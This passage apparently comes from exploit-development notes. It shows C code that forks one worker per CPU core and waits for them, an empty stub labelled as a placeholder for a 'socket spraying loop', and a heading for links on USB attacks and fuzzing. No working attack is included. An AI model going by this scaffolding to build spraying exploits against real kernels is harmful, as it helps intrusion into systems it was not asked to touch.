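        pid_t pid = fork();

        if (pid == 0) {
            work();
            _exit(0);
        }
        if (pid > 0)
            started++;
    }
    for (i = 0; i < started; i++) {
        int status;

        if (wait(&status) > 0 && WIFEXITED(status) &&
            WEXITSTATUS(status) == 0)
            ok++;
    }
    return ok;
}

/* Placeholder for the per-instance socket spraying loop. */
void idle_work(void)
{
}
```

A call like run_workers(worker_count(), idle_work) starts one instance per online core and waits for all of them.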

A set of links to talks about various USB attacks and fuzzing: